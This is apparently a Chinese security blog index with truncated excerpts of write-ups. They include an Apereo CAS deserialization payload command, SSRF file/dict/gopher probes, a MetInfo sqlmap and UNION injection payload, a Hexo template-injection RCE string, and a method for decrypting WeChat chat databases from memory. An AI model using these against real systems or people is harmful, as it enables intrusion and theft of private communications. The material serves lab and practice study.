python代码封装成exe
background想着好玩,就写了个hvv工资实时统计的脚本,可以实时看到收入,可视化的感觉还是很不错的。于是就写了脚本,一开始仅仅是程序运行之后从0开始计数,每过一秒钟工资就增长一部分。后来我朋友说这逻辑不行。得自动算出累计的时间。我一听,好想法。于是乎就开始研究了。当然我全程啥也没做,全部交给GPT了,需要注意的就是这个工作时间,GPT错了很久才纠正过来。工作时间是不能按照24小时来计算的,并且还要考虑跨天的问题。
最终解决了问题,有炫酷的页面
from datetime import datetime, timedelta, timeimport tkinter as tkimport randomdef calculate_working_hours(start_datetime, end_datetime, work_start_time, work_end_time): total_duration = timedelta() current_datetime = start_datetime while current_datetime < ...
蓝方视角下的getshell
background客户让我测测内网,我对内网环境一无所知,也懒得弄,就随便给它看看。我就只看设备上的告警,然后对着ip去测。
apereo cas默认秘钥反序列化getshell设备上看到的告警,内网对内网的,问题不大。以前从来没见过这个洞,于是去测这个漏洞,态势感知就是根据请求包里execution参数特征来识别的。该漏洞源于apereo cas使用了默认的秘钥,导致攻击者可以构造恶意代码,在反序列化的过程中达到命令执行的效果。
漏洞利用工具https://github.com/MrMeizhi/ysoserial-mangguogan/blob/master/ysoserial-managguogan-0.0.1-SNAPSHOT-all.jar利用该工具生成payloadjava -jar .\ysoserial-managguogan-0.0.1-SNAPSHOT-all.jar encode CommonsCollections4
将生成的结果复制到请求包的execution参数中,在请求头中添加cmd:whoami即可执行“whoami”系统命令修复建议:升级软件版本或者 ...
ssrf的一些利用方式
background之前通过国光师傅的靶场学习过ssrf的一些打法,在前几天暗月师傅的中秋打靶活动中用到了ssrf打me来getshell。我也是第一次接触到ssrf打me,于是就好好的记录一下ssrf的打法,发到我的blog上,以下大多数内容都是去年11月份完成的。靶场地址:https://github.com/sqlsec/ssrf-vuls原文链接:https://www.sqlsec.com/2021/05/ssrf.html
靶场拓扑图这是靶场的拓扑图,就是用一个ssrf的点位来打内网的这些服务。
漏洞点
获取网段信息file:///etc/hosts高权限还可以读取/proc/net/arp/etc/network/interfaces
探测存活使用dict协议可判断端口是否开放dict://182.168.1.1:80
172.172.0.25(文件上传)别人新增的环境文件上传这里上传文件 是要用到post请求的 所以需要使用gopher协议来进行请求构造请求包
POST /index.php HTTP/1.1Host: 172.172.0.25Us ...
记一次有意思的'攻防演练'
background去了某场比赛当了某单位的指导老师,全程都是事故,结果也没有达到预期,弱爆了。本来计划中的发展是第一天开始,第二天15:00结束,第一天我按时赶到,然后中午撤。有位大哥来给我顶着。大哥早上都上了高铁,然后单位有事就给他叫回去了。那我肯定就是回不去了。第一天开打我们扫描器一点资产都扫不到,第二天才发下是网络开放的问题,然后给我们加时……就给了个B段的内网地址,自己搜集资产。全是水洞,没啥技术含量我就不记录了,有个我们没做出来的springboot很有意思,我之前也没打过springboot。恶心就恶心在你知道靶机是springboot,但你不知道哪个是靶机,不知道自己看到的是靶机还是业务系统。
CVE-20222-2965确定靶机是这个洞,我们当时也找了个springboot,扫描器也告警了,就是这样的
然后当时全部是内网,我得把poc打包到txt里然后给运维,运维上堡垒机把东西传给我们。我在网上找了几个poc,还找了个利用工具,反正都没打通。我在burp里手动发包,都没效果,shell写不进去,就很奇怪。
我在github上看了扫描器源码里的poc(https:/ ...
获取windows微信聊天记录(持续更新偏移地址)
background昨天看到篇文章写的实战中各种密码凭证的获取,其中包括了钓鱼运维然后从微信中获取敏感信息。这一直是我比较感兴趣的模块。在这之前微信聊天记录的数字化我只会聊天记录备份到模拟器然后再解密。说实话没啥太大的应用空间,不管是实战还是取证也好,这个手段都是不现实的。文章里写的手法是直接上windows,然后拿key解密数据库,这确实是一种高效实用的办法。
获取秘钥微信聊天记录数据库存在了wxid_xxxxxxxxxx/msg/Multi/MSG*.db(数据库每达到270m就会生成一个新的,*就是数据库的编号)引导文件是wxid_xxxxxxxxxx/msg/MicroMsg.db我们要做的就是获取到数据库的秘钥,不同版本的windows微信偏移地址不一样。C#编译成exe命令
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc test.cs
源代码
using System;using System.Collections.Generic;using System.Diagn ...
metinfo5.0.4 RCE
background某次线下赛遇见的,然后就想着复盘一下。版本是metinfo5.0.4,我找这个版本找了老一会,后面别人跟我说5.0.4这个版本是4.0升级上去的,所以先装4.0再装5.0.4。
https://www.metinfo.cn/faq/1519.html
此文没任何技术含量,我太菜了,就仅仅是做个学习记录。
前台sql注入漏洞sqlmap命令python sqlmap.py -u "http://metinfo.com/about/show.php?lang=cn&id=15" --dbs --batch
explang=cn&id=-2506 UNION ALL SELECT 68,68,68,68,68,68,68,68,68,68,68,68,68,68,68,68,68,68,68,68,CONCAT(0x7170706b71,0x6a58425864747852627a625169766a5643464650676e7170775871566e59585279484263744f496c,0x71716b7871),68, ...
hexo的rce
{{joiner.constructor(“global.process.mainModule.require(‘child_process’).exec(‘Calc.exe’)”)() }}
很鸡肋的洞,不能直接带来啥大的危害。
https://gem-love.com/2023/07/25/hexo%E5%8D%9A%E5%AE%A2%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E8%AF%BB%E5%8F%96%E5%92%8C%E4%BB%A3%E7%A0%81%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E/
我的新博客
backgroundhexo搭建安装git
https://git-scm.com/downloads
安装nodejs
https://nodejs.org/en/
换源
npm config set registry http://registry.npm.taobao.org/
安装(找一个文件夹存放博客的文件,右键-open git bash)
npm install hexo-cli -ghexo inithexo s
主题美化安装各种依赖环境,我这里就直接安所有的包了,直接替换掉package.json里的内容,然后在目录下npm install
{ "name": "hexo-site", "version": "0.0.0", "private": true, "scripts": { "build": "hexo generate", "clean&qu ...